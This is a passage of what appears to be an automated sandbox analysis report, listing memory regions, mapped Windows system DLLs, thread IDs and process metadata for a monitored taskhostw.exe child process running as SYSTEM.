region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")
Region:
id = 2232
start_va = 0x7ff857db0000
end_va = 0x7ff857dedfff
monitored = 0
entry_point = 0x7ff857dba050
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 2233
start_va = 0x7ff85d450000
end_va = 0x7ff85d45bfff
monitored = 0
entry_point = 0x7ff85d4527e0
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 2234
start_va = 0x7ff85d7a0000
end_va = 0x7ff85d7befff
monitored = 0
entry_point = 0x7ff85d7a5d30
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 2235
start_va = 0x7ff85f4b0000
end_va = 0x7ff85f501fff
monitored = 0
entry_point = 0x7ff85f4bf530
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2236
start_va = 0x7ff85e410000
end_va = 0x7ff85e4c4fff
monitored = 0
entry_point = 0x7ff85e4522e0
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")
Region:
id = 2237
start_va = 0x7ff85cfe0000
end_va = 0x7ff85d003fff
monitored = 0
entry_point = 0x7ff85cfe3260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 2238
start_va = 0x2280000
end_va = 0x237ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 2239
start_va = 0x7ff857cc0000
end_va = 0x7ff857da5fff
monitored = 0
entry_point = 0x7ff857cdcf10
region_type = mapped_file
name = "usermgr.dll"
filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll")
Region:
id = 2240
start_va = 0x7ff859cb0000
end_va = 0x7ff859de5fff
monitored = 0
entry_point = 0x7ff859cdf350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 2241
start_va = 0x2380000
end_va = 0x247ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002380000"
filename = ""
Region:
id = 2242
start_va = 0x5e0000
end_va = 0x5e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 2243
start_va = 0x5e0000
end_va = 0x5e0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005e0000"
filename = ""
Region:
id = 2244
start_va = 0x7ff857c70000
end_va = 0x7ff857cb0fff
monitored = 0
entry_point = 0x7ff857c74840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Region:
id = 2245
start_va = 0x7ff85c470000
end_va = 0x7ff85c477fff
monitored = 0
entry_point = 0x7ff85c4713e0
region_type = mapped_file
name = "dabapi.dll"
filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll")
Region:
id = 2246
start_va = 0x7ff857c50000
end_va = 0x7ff857c6ffff
monitored = 0
entry_point = 0x7ff857c539a0
region_type = mapped_file
name = "locationwinpalmisc.dll"
filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll")
Region:
id = 2247
start_va = 0x7ff85ca20000
end_va = 0x7ff85ca46fff
monitored = 0
entry_point = 0x7ff85ca27940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 2248
start_va = 0x5e0000
end_va = 0x5e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005e0000"
filename = ""
Region:
id = 2249
start_va = 0x7ff857c10000
end_va = 0x7ff857c46fff
monitored = 0
entry_point = 0x7ff857c16020
region_type = mapped_file
name = "gnssadapter.dll"
filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll")
Region:
id = 2250
start_va = 0x7ff857bb0000
end_va = 0x7ff857c04fff
monitored = 0
entry_point = 0x7ff857bb3fb0
region_type = mapped_file
name = "policymanager.dll"
filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll")
Region:
id = 2251
start_va = 0x7ff857b90000
end_va = 0x7ff857ba9fff
monitored = 0
entry_point = 0x7ff857b92cf0
region_type = mapped_file
name = "locationpelegacywinlocation.dll"
filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll")
Region:
id = 2252
start_va = 0x7ff85fb50000
end_va = 0x7ff85fc92fff
monitored = 0
entry_point = 0x7ff85fb78210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2255
start_va = 0x7ff857940000
end_va = 0x7ff857955fff
monitored = 0
entry_point = 0x7ff857941b60
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2256
start_va = 0x2480000
end_va = 0x257ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002480000"
filename = ""
Region:
id = 2257
start_va = 0x7ff857910000
end_va = 0x7ff85793dfff
monitored = 0
entry_point = 0x7ff857917550
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 2258
start_va = 0x7ff85db20000
end_va = 0x7ff85db40fff
monitored = 0
entry_point = 0x7ff85db30250
region_type = mapped_file
name = "joinutil.dll"
filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll")
Region:
id = 2259
start_va = 0x7ff8578f0000
end_va = 0x7ff857900fff
monitored = 0
entry_point = 0x7ff8578f7ea0
region_type = mapped_file
name = "dcpapi.dll"
filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll")
Region:
id = 2260
start_va = 0x7ff8578c0000
end_va = 0x7ff8578e4fff
monitored = 0
entry_point = 0x7ff8578d2f20
region_type = mapped_file
name = "wificonnapi.dll"
filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll")
Region:
id = 2261
start_va = 0x7ff857800000
end_va = 0x7ff857838fff
monitored = 0
entry_point = 0x7ff857809c90
region_type = mapped_file
name = "aepic.dll"
filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll")
Region:
id = 2262
start_va = 0x7ff8577e0000
end_va = 0x7ff8577f0fff
monitored = 0
entry_point = 0x7ff8577e3e10
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll")
Region:
id = 2263
start_va = 0x7ff859920000
end_va = 0x7ff859ca1fff
monitored = 0
entry_point = 0x7ff859971220
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 2264
start_va = 0x7ff8577c0000
end_va = 0x7ff8577d2fff
monitored = 0
entry_point = 0x7ff8577c57f0
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 2265
start_va = 0x7ff857700000
end_va = 0x7ff8577b0fff
monitored = 0
entry_point = 0x7ff8577788b0
region_type = mapped_file
name = "cellularapi.dll"
filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll")
Region:
id = 2266
start_va = 0x7ff857820000
end_va = 0x7ff857831fff
monitored = 0
entry_point = 0x7ff857829260
region_type = mapped_file
name = "rilproxy.dll"
filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll")
Region:
id = 2267
start_va = 0x7ff8575c0000
end_va = 0x7ff85766dfff
monitored = 0
entry_point = 0x7ff8575d80c0
region_type = mapped_file
name = "windows.networking.connectivity.dll"
filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll")
Region:
id = 2268
start_va = 0x2580000
end_va = 0x267ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 2269
start_va = 0x7ff8575a0000
end_va = 0x7ff8575b6fff
monitored = 0
entry_point = 0x7ff8575a5630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2270
start_va = 0x5f0000
end_va = 0x5f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005f0000"
filename = ""
Region:
id = 2271
start_va = 0x2680000
end_va = 0x277ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002680000"
filename = ""
Region:
id = 2272
start_va = 0x7ff856d30000
end_va = 0x7ff856d3bfff
monitored = 0
entry_point = 0x7ff856d32830
region_type = mapped_file
name = "bi.dll"
filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll")
Region:
id = 2273
start_va = 0x2780000
end_va = 0x297ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 2274
start_va = 0x2800000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2275
start_va = 0x2900000
end_va = 0x29fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 2282
start_va = 0x1d00000
end_va = 0x1d7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 2283
start_va = 0x7ff85c690000
end_va = 0x7ff85c6abfff
monitored = 0
entry_point = 0x7ff85c6937a0
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 2284
start_va = 0x1d80000
end_va = 0x1dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d80000"
filename = ""
Region:
id = 2285
start_va = 0x7ff85c6b0000
end_va = 0x7ff85c6e1fff
monitored = 0
entry_point = 0x7ff85c6bb0c0
region_type = mapped_file
name = "shacct.dll"
filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll")
Region:
id = 2286
start_va = 0x7ff856990000
end_va = 0x7ff856a2afff
monitored = 0
entry_point = 0x7ff856997220
region_type = mapped_file
name = "settingsync.dll"
filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll")
Region:
id = 2287
start_va = 0x1060000
end_va = 0x1061fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001060000"
filename = ""
Region:
id = 2288
start_va = 0x7ff857960000
end_va = 0x7ff8579c3fff
monitored = 0
entry_point = 0x7ff857975ae0
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 2289
start_va = 0x1c00000
end_va = 0x1cdffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 2290
start_va = 0x2580000
end_va = 0x267ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 2291
start_va = 0x7ff856760000
end_va = 0x7ff856770fff
monitored = 0
entry_point = 0x7ff8567628d0
region_type = mapped_file
name = "credentialmigrationhandler.dll"
filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll")
Region:
id = 2292
start_va = 0x2a00000
end_va = 0x2afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 2293
start_va = 0x2780000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 2294
start_va = 0x2a00000
end_va = 0x2afffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a00000"
filename = ""
Region:
id = 2295
start_va = 0x7ff857840000
end_va = 0x7ff8578b9fff
monitored = 0
entry_point = 0x7ff857867630
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 2296
start_va = 0x7ff8566c0000
end_va = 0x7ff856759fff
monitored = 0
entry_point = 0x7ff8566dada0
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 2392
start_va = 0x7ff85dea0000
end_va = 0x7ff85df38fff
monitored = 0
entry_point = 0x7ff85decf4e0
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 2393
start_va = 0x1070000
end_va = 0x1071fff
monitored = 0
entry_point = 0x1075630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2394
start_va = 0x1080000
end_va = 0x1084fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 2396
start_va = 0x7ff856c20000
end_va = 0x7ff856cdffff
monitored = 0
entry_point = 0x7ff856c4fd20
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 2397
start_va = 0x1090000
end_va = 0x1090fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001090000"
filename = ""
Region:
id = 2403
start_va = 0x7ff856600000
end_va = 0x7ff85660dfff
monitored = 0
entry_point = 0x7ff856601460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 2404
start_va = 0x7ff8565a0000
end_va = 0x7ff8565f1fff
monitored = 0
entry_point = 0x7ff8565a38e0
region_type = mapped_file
name = "proximityservice.dll"
filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll")
Region:
id = 2405
start_va = 0x7ff856570000
end_va = 0x7ff85659cfff
monitored = 0
entry_point = 0x7ff856572290
region_type = mapped_file
name = "proximitycommon.dll"
filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll")
Region:
id = 2406
start_va = 0x7ff856560000
end_va = 0x7ff856568fff
monitored = 0
entry_point = 0x7ff856561ed0
region_type = mapped_file
name = "proximitycommonpal.dll"
filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll")
Region:
id = 2407
start_va = 0x7ff856ce0000
end_va = 0x7ff856d17fff
monitored = 0
entry_point = 0x7ff856cf8cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2408
start_va = 0x7ff856550000
end_va = 0x7ff85655ffff
monitored = 0
entry_point = 0x7ff856551700
region_type = mapped_file
name = "proximityservicepal.dll"
filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll")
Region:
id = 2409
start_va = 0x7ff85e330000
end_va = 0x7ff85e3b5fff
monitored = 0
entry_point = 0x7ff85e33d8f0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 2410
start_va = 0x7ff85cb20000
end_va = 0x7ff85cb51fff
monitored = 0
entry_point = 0x7ff85cb32340
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 2486
start_va = 0x2b00000
end_va = 0x2bfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 2500
start_va = 0x7ff85cfd0000
end_va = 0x7ff85cfdbfff
monitored = 0
entry_point = 0x7ff85cfd2790
region_type = mapped_file
name = "hid.dll"
filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")
Region:
id = 2501
start_va = 0x1070000
end_va = 0x1071fff
monitored = 0
entry_point = 0x1075630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 2502
start_va = 0x1080000
end_va = 0x1084fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 2552
start_va = 0x2b00000
end_va = 0x2b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b00000"
filename = ""
Region:
id = 2562
start_va = 0x1070000
end_va = 0x1070fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001070000"
filename = ""
Region:
id = 2578
start_va = 0x1070000
end_va = 0x1070fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001070000"
filename = ""
Region:
id = 2631
start_va = 0x2b80000
end_va = 0x2d7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b80000"
filename = ""
Region:
id = 2632
start_va = 0x2c00000
end_va = 0x2cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c00000"
filename = ""
Region:
id = 2702
start_va = 0x2d00000
end_va = 0x2dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d00000"
filename = ""
Region:
id = 2703
start_va = 0x7ff85c500000
end_va = 0x7ff85c685fff
monitored = 0
entry_point = 0x7ff85c54d700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 2704
start_va = 0x1070000
end_va = 0x1073fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2705
start_va = 0x13a0000
end_va = 0x13e4fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db")
Region:
id = 2706
start_va = 0x1080000
end_va = 0x1083fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2707
start_va = 0x2e00000
end_va = 0x2e8dfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 2709
start_va = 0x7ff855800000
end_va = 0x7ff855843fff
monitored = 0
entry_point = 0x7ff85580c010
region_type = mapped_file
name = "execmodelclient.dll"
filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll")
Region:
id = 2710
start_va = 0x7ff85bfc0000
end_va = 0x7ff85c07dfff
monitored = 0
entry_point = 0x7ff85c002d40
region_type = mapped_file
name = "coremessaging.dll"
filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll")
Region:
id = 2711
start_va = 0x1090000
end_va = 0x1090fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001090000"
filename = ""
Region:
id = 2712
start_va = 0x7ff858270000
end_va = 0x7ff8582b9fff
monitored = 0
entry_point = 0x7ff85827ac30
region_type = mapped_file
name = "deviceaccess.dll"
filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll")
Region:
id = 2713
start_va = 0x2e90000
end_va = 0x2f8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e90000"
filename = ""
Thread:
id = 149
os_tid = 0x364
Thread:
id = 150
os_tid = 0x384
Thread:
id = 151
os_tid = 0x3d8
Thread:
id = 152
os_tid = 0x144
Thread:
id = 153
os_tid = 0x148
Thread:
id = 154
os_tid = 0x14c
Thread:
id = 155
os_tid = 0x18c
Thread:
id = 156
os_tid = 0x174
Thread:
id = 157
os_tid = 0x16c
Thread:
id = 158
os_tid = 0x168
Thread:
id = 159
os_tid = 0x1c8
Thread:
id = 160
os_tid = 0x1b0
Thread:
id = 161
os_tid = 0x20c
Thread:
id = 162
os_tid = 0x258
Thread:
id = 163
os_tid = 0x284
Thread:
id = 164
os_tid = 0x290
Thread:
id = 165
os_tid = 0x2ac
Thread:
id = 166
os_tid = 0x2d0
Thread:
id = 167
os_tid = 0x2f0
Thread:
id = 168
os_tid = 0x404
Thread:
id = 169
os_tid = 0x41c
Thread:
id = 170
os_tid = 0x430
Thread:
id = 171
os_tid = 0x444
Thread:
id = 172
os_tid = 0x47c
Thread:
id = 173
os_tid = 0x4d8
Thread:
id = 174
os_tid = 0x50c
Thread:
id = 175
os_tid = 0x534
Thread:
id = 193
os_tid = 0x4b0
Thread:
id = 197
os_tid = 0x514
Thread:
id = 201
os_tid = 0x5d8
Thread:
id = 209
os_tid = 0x608
Thread:
id = 227
os_tid = 0x68c
Thread:
id = 229
os_tid = 0x6a0
Process:
id = "8"
image_name = "taskhostw.exe"
filename = "c:\\windows\\system32\\taskhostw.exe"
page_root = "0x329cf000"
os_pid = "0x474"
os_integrity_level = "0x4000"
os_privileges = "0xe60b1e890"
monitor_reason = "child_process"
parent_id = "7"
os_parent_pid = "0x360"
cmd_line = "taskhostw.exe SYSTEM"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\SYSTEM"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\DcpSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\RetailDemo" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000aea9" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]
Region:
id = 2297
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2298
start_va = 0x30000
end_va = 0x44fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2299
start_va = 0x50000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 2300
start_va = 0xd0000
end_va = 0xd3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 2301
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2302
start_va = 0xf0000
end_va = 0xf1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 2303
start_va = 0x200000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 2304
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2305
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 2306
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 2307
start_va = 0x7ff67cd20000
end_va = 0x7ff67cd38fff
monitored = 0
entry_point = 0x7ff67cd259b0
region_type = mapped_file
name = "taskhostw.exe"
filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")
Region:
id = 2308
start_va = 0x7ff8619c0000
end_va = 0x7ff861b80fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2487
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2488
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2489
start_va = 0x430000
end_va = 0x52ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 2490
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 2491
start_va = 0x7ff85e0e0000
end_va = 0x7ff85e2c7fff
monitored = 0
entry_point = 0x7ff85e10ba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2492
start_va = 0x7ff85f160000
end_va = 0x7ff85f20cfff
monitored = 0
entry_point = 0x7ff85f1781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2493
start_va = 0x7ff85fca0000
end_va = 0x7ff85fd3cfff
monitored = 0
entry_point = 0x7ff85fca78a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2494
start_va = 0x530000
end_va = 0x5affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 2495
start_va = 0x7ff8616d0000
end_va = 0x7ff8617ebfff
monitored = 0
entry_point = 0x7ff8617102b0
